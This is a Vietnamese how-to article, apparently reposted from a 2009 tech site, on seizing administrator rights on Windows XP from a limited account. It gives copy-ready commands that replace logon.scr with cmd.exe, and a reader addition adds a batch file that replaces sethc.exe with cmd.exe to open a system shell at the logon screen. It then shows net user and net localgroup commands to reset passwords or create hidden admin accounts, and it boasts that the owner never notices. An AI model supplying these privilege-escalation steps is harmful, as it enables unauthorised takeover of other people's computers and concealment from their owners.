Tài liệu Hack mật khẩu Admin trong Windows XP từ User thường doc
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (124.75 KB, 3 trang )
Hack mật khẩu Admin trong Windows XP từ User
thường
Cập nhật lúc 07h38' ngày 18/09/2009
Bản in
Gửi cho bạn bè
Phản hồi
Xem thêm: hack, mật khẩu, admin, windows xp
Quản Trị Mạng - Bạn chỉ được truy cập vào máy tính với một quyền user thông thường và
điều đó khiến bạn bực bội mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Bài
hướng dẫn này sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mật khẩu của Admin mà
không cần sử dụng tới một phần mềm thứ ba nào cả.
Lưu ý: Cách này không áp dụng được cho ổ đĩa NTFS
- Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập chính xác các
câu lệnh sau:
cd\
trở về thư mục gốc
cd\windows\system32
vào thư mục system32
mkdir hackdir
tạo thư mục hackdir
copy logon.scr hackdir\logon.scr
sao lưu file logon.scr vào thư mục hackdir
copy cmd.exe hackdir\cmd.exe
sao lưu file cmd.exe vào thư mục hackdir
del logon.scr
xóa file logon.scr gốc
copy hackdir\cmd.exe logon.scr
sao lưu file cmd.exe trong thư mục hackdir trở về
system32 và đổi tên thành logon.scr
exit
đóng cửa sổ lệnh
- Sau đó khởi động lại máy tính.
Với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường bằng
lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không phải
quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mật khẩu của tài
khoản Admin trên máy.
Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện ra.
Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau:
Cách 1: Đổi mật khẩu tài khoản Admin sẵn có
Tại cửa sổ lệnh có thể sử dụng một trong các lệnh sau:
net user <username> <new pass>
thay mật khẩu tài khoản quản trị bằng mật khẩu mới
hoặc
net user <username>
xóa trắng mật khẩu của tài khoản này
Ví dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản Administrator
thành 123.
Cách 2: Thêm một tài khoản mới với quyền Admin
Tại cửa sổ lệnh lần lượt gõ các lệnh sau:
net user <username> <password> /add
thêm một tài khoản với tên và
mật khẩu tương ứng
net localgroup Administrators <username> /add
đưa tài khoản vừa tạo vào
nhóm quản trị
Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mật khẩu
vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức cao nhất.
Quan trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để
hệ thống của bạn hoạt động trở lại như bình thường.
Đối với cách tác giả trình bày ở trên, bạn Doan Khan Luong có thắc mắc tại sao một user có quyền
limited lại có thể xóa được file trong thư mục System32 là một câu hỏi hay,
Mình xin bổ sung thêm một cách nữa cũng có thể "hack" được password của bất kì một user nào
đó hoặc chiếm toàn quyền trên bất kì một máy tính nào đó,
C1 : Vào Start / Run / notepad
@echo off
cls
cd %systemroot%/system32
ren sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
---> bạn lưu file này với tên bất kì với phần mở rộng là : *.bat (ví dụ : hack.bat)
------------Quá trình test------------
+ Tại màn hình logon bạn thử nhấn shift 05 lần, nếu sau khi nhấn bạn thấy xuất hiện cửa sổ
command prompt là thành công,
***Lưu ý : Khi ta chưa đăng nhập bất kì user nào, thì tại màn hình logon ta cho xuất hiện được của
sổ command prompt, máy tính hiểu ta đang "đứng" tại user có quyền admin
+ Tới đây, với quyền admin thì bạn có thể làm được mọi thứ trên máy tính rồi phải không ?
1. Reset user bất kì bằng lệnh : net user [tên user] *
2. "Nâng cấp" user đang có quyền limited lên quyền admin bằng lệnh :"net localgroup"
Cú pháp : net localgroup [tên group] [tên user] /add
ví dụ : net localgroup administrators teo /add
3.Tạo một user mới với quyền admin, đăng nhập user đó vào máy tính, làm những gì bạn muốn
sau đó xóa hẳn user đó khỏi máy tính <------ cách này chủ nhân máy tính không hề biết bạn vào và
làm những công việc gì trên máy tính đó,
C2 : Bạn có thể sử dụng đĩa LHT từ version 9.7 trở lên, cách thực hiện như sau :
+ Bạn chỉnh máy tính boot từ CD-ROM
+ Đăng nhập vào :"mini windows xp"
+ Vào đường dẫn sau : C:\windows\System32\
+ Tìm và đổi tên cmd.exe thành sethc.exe
+ Tại màn hình logon, bạn cũng thực hiện tương tự như cách 01
Chúc các bạn thành công!!!
Nếu có thắc mắc, các bạn có thể liên hệ với tôi theo địa chỉ email :
1.
2.
